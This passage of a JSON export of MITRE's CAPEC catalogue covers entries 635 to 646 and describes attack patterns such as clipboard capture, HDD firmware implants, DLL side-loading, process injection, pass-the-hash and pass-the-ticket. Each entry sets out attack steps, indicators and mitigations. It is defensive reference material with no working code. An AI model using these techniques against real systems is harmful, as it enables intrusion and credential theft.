Capture"}]},"References":{"Reference":[{"External_Reference_ID":"REF-653"},{"External_Reference_ID":"REF-654"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances, References"}]}},"635":{"ID":"635","Name":"Alternative Execution Due to Deceptive Filenames","Abstraction":"Standard","Status":"Draft","Description":"The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"165"}},"Prerequisites":{"Prerequisite":"The use of the file must be controlled by the file extension."},"Mitigations":{"Mitigation":"Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"162"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"}}},"636":{"ID":"636","Name":"Hiding Malicious Data or Code within Files","Abstraction":"Standard","Status":"Draft","Description":"Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"165"}},"Prerequisites":{"Prerequisite":"The operating system must support a file system that allows for alternate data storage for a file."},"Mitigations":{"Mitigation":"Many tools are available to search for the hidden data. Scan regularly for such data using one of these tools."},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1001.002","Entry_Name":"Data Obfuscation:Steganography"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1218.001","Entry_Name":"Signed Binary Proxy Execution:Compiled HTML File"}]},"References":{"Reference":{"External_Reference_ID":"REF-493"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"637":{"ID":"637","Name":"Collect Data from Clipboard","Abstraction":"Detailed","Status":"Stable","Description":"The adversary exploits an application that allows for the copying of sensitive data or information by collecting information copied to the clipboard. Data copied to the clipboard can be accessed by other applications, such as malware built to exfiltrate or log clipboard contents on a periodic basis. In this way, the adversary aims to garner information to which they are unauthorized.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find an application that allows copying sensititve data to clipboad] An adversary first needs to find an application that allows copying and pasting of sensitive information. This could be an application that prints out temporary passwords to the screen, private email addresses, or any other sensitive information or data"},{"Step":"2","Phase":"Experiment","Description":"[Target users of the application] An adversary will target users of the application in order to obtain the information in their clipboard on a periodic basic","Technique":["Install malware on a user\'s system designed to log clipboard contents periodically","Get the user to click on a malicious link that will bring them to an application to log the contents of the clipboard"]},{"Step":"3","Phase":"Exploit","Description":"[Follow-up attack] Use any sensitive information found to carry out a follow-up attack"}]},"Prerequisites":{"Prerequisite":"The adversary must have a means (i.e., a pre-installed tool or background process) by which to collect data from the clipboard and store it. That is, when the target copies data to the clipboard (e.g., to paste into another application), the adversary needs some means of capturing that data in a third location."},"Skills_Required":{"Skill":["To deploy a hidden process or malware on the system to automatically collect clipboard data.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["While copying and pasting of data with the clipboard is a legitimate and practical function, certain situations and context may require the disabling of this feature. Just as certain applications disable screenshot capability, applications that handle highly sensitive information should consider disabling copy and paste functionality.","Employ a robust identification and audit/blocking via using an allowlist of applications on your system. Malware may contain the functionality associated with this attack pattern."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"267"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1115","Entry_Name":"Clipboard Data"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"638":{"ID":"638","Name":"Altered Component Firmware","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits systems features and/or improperly protected firmware of hardware components, such as Hard Disk Drives (HDD), with the goal of executing malicious code from within the component\'s Master Boot Record (MBR). Conducting this type of attack entails the adversary infecting the target with firmware altering malware, using known tools, and a payload. Once this malware is executed, the MBR is modified to include instructions to execute the payload at desired intervals and when the system is booted up. A successful attack will obtain persistence within the victim system even if the operating system is reinstalled and/or if the component is formatted or has its data erased.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"452"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Select Target] The adversary searches for a suitable target to attack, such as government and/or private industry organizations.","Technique":"Conduct reconnaissance to determine potential targets to exploit."},{"Step":"2","Phase":"Explore","Description":"[Identify Components] After selecting a target, the adversary determines whether a vulnerable component, such as a specific make and model of a HDD, is contained within the target system.","Technique":["[Remote Access Vector] The adversary gains remote access to the target, typically via additional malware, and explores the system to determine hardware components that are being leveraged.","[Physical Access Vector] The adversary intercepts components in transit and determines if the component is vulnerable to attack."]},{"Step":"3","Phase":"Experiment","Description":"[Optional: Create Payload] If not using an already existing payload, the adversary creates their own to be executed at defined intervals and upon system boot processes. This payload may then be tested on the target system or a test system to confirm its functionality."},{"Step":"4","Phase":"Exploit","Description":"[Insert Firmware Altering Malware] Once a vulnerable component has been identified, the adversary leverages known malware tools to infect the component\'s firmware and drop the payload within the component\'s MBR. This allows the adversary to maintain persistence on the target and execute the payload without being detected.","Technique":["The adversary inserts the firmware altering malware on the target component, via the use of known malware tools.","[Physical Access Vector] The adversary then sends the component to its original intended destination, where it will be installed onto a victim system."]}]},"Prerequisites":{"Prerequisite":["Advanced knowledge about the target component\'s firmware","Advanced knowledge about Master Boot Records (MBR)","Advanced knowledge about tools used to insert firmware altering malware.","Advanced knowledge about component shipments to the target organization."]},"Skills_Required":{"Skill":["Ability to access and reverse engineer hardware component firmware.",{"Level":"High"},"Ability to intercept components in transit.",{"Level":"High"},"Ability to create malicious payload to be executed from MBR.",{"Level":"Medium"},"Ability to leverage known malware tools to infect target system and insert firmware altering malware/payload",{"Level":"Low"}]},"Resources_Required":{"Resource":["Manufacturer source code for hardware components.","Malware tools used to insert malware and payload onto target component.","Either remote or physical access to the target component."]},"Indicators":{"Indicator":["Output observed from processes, API calls, or Self-Monitoring, Analysis and Reporting Technology (SMART) may provide insight into malicious modifications of MBRs.","Digital forensics tools may produce output that indicates an attack of this nature has occurred. Examples include unexpected disk partitions and/or unusual strings."]},"Consequences":{"Consequence":[{"Scope":["Authentication","Authorization"],"Impact":["Gain Privileges","Execute Unauthorized Commands","Bypass Protection Mechanism","Hide Activities"]},{"Scope":["Confidentiality","Access Control"],"Impact":["Read Data","Modify Data"]}]},"Mitigations":{"Mitigation":["Leverage hardware components known to not be susceptible to these types of attacks.","Implement hardware RAID infrastructure."]},"Example_Instances":{"Example":"In 2014, the Equation group was observed levering known malware tools to conduct component firmware alteration attacks against hard drives. In total, 12 HDD categories were shown to be vulnerable from manufacturers such as Western Digital, HGST, Samsung, and Seagate. Because of their complexity, only a few victims were targeted by these attacks. [REF-664]"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1542.002","Entry_Name":"Pre-OS Boot:Component Firmware"}},"References":{"Reference":[{"External_Reference_ID":"REF-664"},{"External_Reference_ID":"REF-665"},{"External_Reference_ID":"REF-666"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Consequences, Description, Example_Instances, Execution_Flow, Indicators, Mitigations, Prerequisites, References, Resources_Required, Skills_Required, Typical_Severity"}]}},"639":{"ID":"639","Name":"Probe System Files","Abstraction":"Detailed","Status":"Stable","Description":"An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"545","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"An adversary has access to the file system of a system."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Verify that files have proper access controls set, and reduce the storage of sensitive information to only what is necessary."},"Example_Instances":{"Example":["Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.","Adversaries may search network shares on computers they have compromised to find files of interest."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"552"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1552.001","Entry_Name":"Unsecured Credentials:Credentials in Files"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1039","Entry_Name":"Data from Network Shared Drive"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-04"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}}},"640":{"ID":"640","Name":"Inclusion of Code in Existing Process","Abstraction":"Detailed","Status":"Stable","Description":"The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process\'s memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, and more.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"251"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target process] The adversary determines a process with sufficient privileges that they wish to include code into.","Technique":["On Windows, use the process explorer\'s security tab to see if a process is running with administror privileges.","On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt to include simple code with known output] The adversary attempts to include very simple code into the existing process to determine if the code inclusion worked. The code will differ based on the approach used to include code into an existing process."},{"Step":"3","Phase":"Exploit","Description":"[Include arbitrary code into existing process] Once an adversary has determined that including code into the existing process is possible, they will include code for a targeted purpose, such as accessing that process\'s memory."}]},"Prerequisites":{"Prerequisite":"The targeted application fails to verify the integrity of the running process that allows an adversary to execute arbitrary code."},"Skills_Required":{"Skill":["Knowledge of how to load malicious code into the memory space of a running process, as well as the ability to have the running process execute this code. For example, with DLL injection, the adversary must know how to load a DLL into the memory space of another running process, and cause this process to execute the code inside of the DLL.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Execute Unauthorized Commands","Read Data"]}},"Mitigations":{"Mitigation":["Prevent unknown or malicious software from loading through using an allowlist policy.","Properly restrict the location of the software being used.","Leverage security kernel modules providing advanced access control and process restrictions like SELinux.","Monitor API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and similar for Windows.","Monitor API calls like ptrace system call, use of LD_PRELOAD environment variable, dlfcn dynamic linking API calls, and similar for Linux.","Monitor API calls like SetWindowsHookEx and SetWinEventHook which install hook procedures for Windows.","Monitor processes and command-line arguments for unknown behavior related to code injection."]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1055","Entry_Name":"Process Injection"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.006","Entry_Name":"Hijack Execution Flow:Dynamic Linker Hijacking"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"641":{"ID":"641","Name":"DLL Side-Loading","Abstraction":"Detailed","Status":"Stable","Description":"An adversary places a malicious version of a Dynamic-Link Library (DLL) in the Windows Side-by-Side (WinSxS) directory to trick the operating system into loading this malicious DLL instead of a legitimate DLL. Programs specify the location of the DLLs to load via the use of WinSxS manifests or DLL redirection and if they aren\'t used then Windows searches in a predefined set of directories to locate the file. If the applications improperly specify a required DLL or WinSxS manifests aren\'t explicit about the characteristics of the DLL to be loaded, they can be vulnerable to side-loading.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"159"}},"Prerequisites":{"Prerequisite":"The target must fail to verify the integrity of the DLL before using them."},"Skills_Required":{"Skill":["Trick the operating system in loading a malicious DLL instead of a legitimate DLL.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Execute Unauthorized Commands","Bypass Protection Mechanism"]}},"Mitigations":{"Mitigation":["Prevent unknown DLLs from loading through using an allowlist policy.","Patch installed applications as soon as new updates become available.","Properly restrict the location of the software being used.","Use of sxstrace.exe on Windows as well as manual inspection of the manifests.","Require code signing and avoid using relative paths for resources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"706"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.002","Entry_Name":"Hijack Execution Flow:DLL Side-Loading"}},"References":{"Reference":{"External_Reference_ID":"REF-501"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"}]}},"642":{"ID":"642","Name":"Replace Binaries","Abstraction":"Detailed","Status":"Draft","Description":"Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Prerequisites":{"Prerequisite":"The attacker must be able to place the malicious binary on the target machine."},"Mitigations":{"Mitigation":"Insure that binaries commonly used by the system have the correct file permissions. Set operating system policies that restrict privilege elevation of non-Administrators. Use auditing tools to observe changes to system services."},"Example_Instances":{"Example":["The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.","By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\\\Windows\\\\system32\\\\. This value is set in the registry at HKEY_CURRENT_USER\\\\Control Panel\\\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"732"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.005","Entry_Name":"Hijack Execution Flow:Executable Installer File Permissions Weakness"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.010","Entry_Name":"Hijack Execution Flow:Service File Permissions Weakness"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Binary planting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Example_Instances, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"643":{"ID":"643","Name":"Identify Shared Files/Directories on System","Abstraction":"Detailed","Status":"Draft","Description":"An adversary discovers connections between systems by exploiting the target system\'s standard practice of revealing them in searchable, common areas. Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"309"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"545"},{"Nature":"CanPrecede","CAPEC_ID":"165"}]},"Prerequisites":{"Prerequisite":"The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)."},"Skills_Required":{"Skill":["Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line. The adversary, or their malware, can simply employ a set of commands that search for shared drives on the system (e.g., net view \\\\\\\\remote system or net share).",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"The adversary is potentially able to identify the location of sensitive information or lateral pathways through the network."}},"Mitigations":{"Mitigation":"Identify unnecessary system utilities or potentially malicious software that may contain functionality to identify network share information, and audit and/or block them by using allowlist tools."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"267"},{"CWE_ID":"200"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1135","Entry_Name":"Network Share Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"644":{"ID":"644","Name":"Use of Captured Hashes (Pass The Hash)","Abstraction":"Detailed","Status":"Stable","Description":"An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential (e.g. userID and password) hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols. When authenticating via LM or NTLM, an authenticating account\'s plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account\'s hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"653"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"165"},{"Nature":"CanPrecede","CAPEC_ID":"549"},{"Nature":"CanPrecede","CAPEC_ID":"545"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known Windows credential hash value pairs] The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.","Technique":["An adversary purchases breached Windows credential hash value pairs from the dark web.","An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.","An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.","An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt domain authentication] Try each Windows credential hash value pair until the target grants access.","Technique":"Manually or automatically enter each Windows credential hash value pair through the target\'s interface."},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within domain systems or applications."}]},"Prerequisites":{"Prerequisite":["The system/application is connected to the Windows domain.","The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.","The adversary possesses known Windows credential hash value pairs that exist on the target domain."]},"Skills_Required":{"Skill":["Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A list of known Window credential hash value pairs for the targeted domain."},"Indicators":{"Indicator":["Authentication attempts use credentials that have been used previously by the account in question.","Authentication attempts are originating from IP addresses or locations that are inconsistent with the user\'s normal IP addresses or locations.","Data is being transferred and/or removed from systems/applications within the network.","Suspicious or Malicious software is downloaded/installed on systems within the domain.","Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user\'s normal behavior."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Prevent the use of Lan Man and NT Lan Man authentication on severs and apply patch KB2871997 to Windows 7 and higher systems.","Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.","Monitor system and domain logs for abnormal credential access.","Create a strong password policy and ensure that your system enforces this policy.","Leverage system penetration testing and other defense in depth methods to determine vulnerable systems within a domain."]},"Example_Instances":{"Example":["Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]","Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"836"},{"CWE_ID":"308"},{"CWE_ID":"294"},{"CWE_ID":"308"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1550.002","Entry_Name":"Use Alternate Authentication Material:Pass The Hash"}},"References":{"Reference":[{"External_Reference_ID":"REF-575"},{"External_Reference_ID":"REF-580"},{"External_Reference_ID":"REF-581"},{"External_Reference_ID":"REF-582"},{"External_Reference_ID":"REF-583"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings"}}},"645":{"ID":"645","Name":"Use of Captured Tickets (Pass The Ticket)","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account\'s credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"652"},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Prerequisites":{"Prerequisite":["The adversary needs physical access to the victim system.","The use of a third-party credential harvesting tool."]},"Skills_Required":{"Skill":["Determine if Kerberos authentication is used on the server.",{"Level":"Low"},"The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Reset the built-in KRBTGT account password twice to invalidate the existence of any current Golden Tickets and any tickets derived from them.","Monitor system and domain logs for abnormal access."]},"Example_Instances":{"Example":"Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"294"},{"CWE_ID":"308"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1550.003","Entry_Name":"Use Alternate Authentication Material:Pass The Ticket"}},"References":{"Reference":{"External_Reference_ID":"REF-584"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"}}},"646":{"ID":"646","Name":"Peripheral Footprinting","Abstraction":"Standard","Status":"Stable","Description":"Adversaries may attempt to obtain information about attached peripheral devices and components connected to a computer system. Examples may include discovering the presence of iOS devices by searching for backups, analyzing the Windows registry to determine what USB devices have been connected, or infecting a victim system with malware to report when a USB device has been connected. This may allow the adversary to gain additional insight about the system or network environment, which may be useful in constructing further attacks.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary needs either physical or remote access to the victim system."},"Skills_Required":{"Skill":["The adversary needs to be able to infect the victim system in a manner that gives them remote access.",{"Level":"Medium"},"If analyzing the Windows registry, the adversary must understand the registry structure to know where to look for devices.",{"Level":"Medium"}]},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process 